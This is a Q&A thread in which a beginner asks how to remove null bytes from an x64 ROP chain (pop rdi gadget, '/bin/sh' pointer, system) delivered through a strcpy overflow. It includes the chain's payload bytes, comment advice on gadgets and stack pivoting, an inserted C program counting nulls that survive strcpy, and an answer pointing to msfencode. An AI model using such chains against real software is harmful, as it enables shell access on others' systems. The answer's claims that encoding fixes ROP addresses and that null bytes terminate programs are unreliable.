
So I have this ROP chain for x64 architecture:

0x0000000000400b60: pop rdi; ret; 
0x482cf5 0x68732f6e69622f ('/bin/sh')
0x401550 <system>

In Payload:

\x60\x0b\x40\x00\x00\x00\x00\x00\xf5\x2c\x48\x50\x15\x40

How should I get rid of the 0s? My buffer is overflowed with strcpy, and it stops on 0.

Any precise answer or general advice?

My effort was to build this ROP chain. Unfortunately, I am a beginner, so I got stuck at this point.

Thanks,

dev
  • If you append NOPs (0x90), that should remove the 0x00. – dylan7 Mar 10 '16 at 23:12
  • I use a ROP chain since the stack is not executable. 0x90 NOP is an execution. – dev Mar 11 '16 at 09:53
  • Well, since you're building a ROP chain, you'll need to look for gadgets in the executable that contain such an instruction sequence, or alternatives that do not use null bytes. There are such instructions. Or get your chain in memory some other way and stack pivot, which is commonly done. – dylan7 Mar 11 '16 at 17:48
  • Might be helpful http://resources.infosecinstitute.com/return-oriented-programming-rop-attacks/ – dylan7 Mar 11 '16 at 17:54
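To make the question's problem concrete, here is an added C example (not code from the question or the answer) that lays out the three addresses from the question exactly as the 8-byte stack slots sit in memory on x86-64, counts the null bytes, and pushes the result through the real strcpy to see how much of it arrives. The addresses are the ones given in the question; the buffer sizes and the 0xAA sentinel are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The three stack slots from the question, in the order they are laid out. */
static const uint64_t chain[] = {
    0x0000000000400b60ULL, /* pop rdi; ret */
    0x0000000000482cf5ULL, /* pointer to the '/bin/sh' string */
    0x0000000000401550ULL, /* system */
};
#define CHAIN_QWORDS (sizeof chain / sizeof chain[0])
#define CHAIN_BYTES  (CHAIN_QWORDS * 8)

/* Serialise the chain little-endian, exactly as each 8-byte slot is stored
 * in memory on x86-64.  Returns the number of bytes written. */
size_t serialize_chain(uint8_t *out, size_t cap) {
    size_t n = 0;
    for (size_t i = 0; i < CHAIN_QWORDS; i++)
        for (unsigned b = 0; b < 8 && n < cap; b++)
            out[n++] = (uint8_t)(chain[i] >> (8 * b));
    return n;
}

/* Total number of null bytes in the serialised chain. */
size_t chain_null_count(void) {
    uint8_t buf[CHAIN_BYTES];
    size_t len = serialize_chain(buf, sizeof buf);
    size_t nulls = 0;
    for (size_t i = 0; i < len; i++)
        nulls += (buf[i] == 0);
    return nulls;
}

/* Offset of the first null byte: the point at which strcpy stops reading. */
size_t chain_first_null(void) {
    uint8_t buf[CHAIN_BYTES];
    size_t len = serialize_chain(buf, sizeof buf);
    size_t i = 0;
    while (i < len && buf[i] != 0)
        i++;
    return i;
}

/* Run the chain through the real strcpy and report how many payload bytes
 * land in the destination (strcpy copies up to and including the first NUL). */
size_t bytes_surviving_strcpy(void) {
    uint8_t src[CHAIN_BYTES + 1];
    size_t len = serialize_chain(src, CHAIN_BYTES);
    src[len] = 0;                    /* terminate the source string */
    char dst[CHAIN_BYTES + 1];
    memset(dst, 0xAA, sizeof dst);   /* sentinel: bytes strcpy never touches stay 0xAA */
    strcpy(dst, (const char *)src);
    return strlen(dst);
}

int main(void) {
    uint8_t buf[CHAIN_BYTES];
    size_t len = serialize_chain(buf, sizeof buf);
    printf("chain bytes (%zu):", len);
    for (size_t i = 0; i < len; i++)
        printf(" %02x", buf[i]);
    printf("\nnull bytes: %zu, first one at offset %zu\n",
           chain_null_count(), chain_first_null());
    printf("bytes that survive strcpy: %zu of %zu\n",
           bytes_surviving_strcpy(), len);
    return 0;
}
```

Every user-space address in the question is below 2^32, so each 8-byte slot carries five zero bytes; the very first slot already has a null at offset 3, which is where strcpy stops. That is the check to run before worrying about encoders: if the copy primitive is strcpy, a chain of full-width x86-64 addresses cannot pass through it unchanged.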

1 Answer


Use msfencode: https://www.offensive-security.com/metasploit-unleashed/msfencode/

The 0's you're talking about are null bytes, which are essentially terminators. Whenever the program encounters a null byte, the program is terminated. Using msfencode you can use the -b option to avoid the usage of null bytes.

In addition you might want to avoid other characters as well, such as 0x0A and 0x0D, which are line breaks.

root@kali:~# msfencode -h

    Usage: /usr/bin/msfencode <options>

OPTIONS:

    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template
Jeroen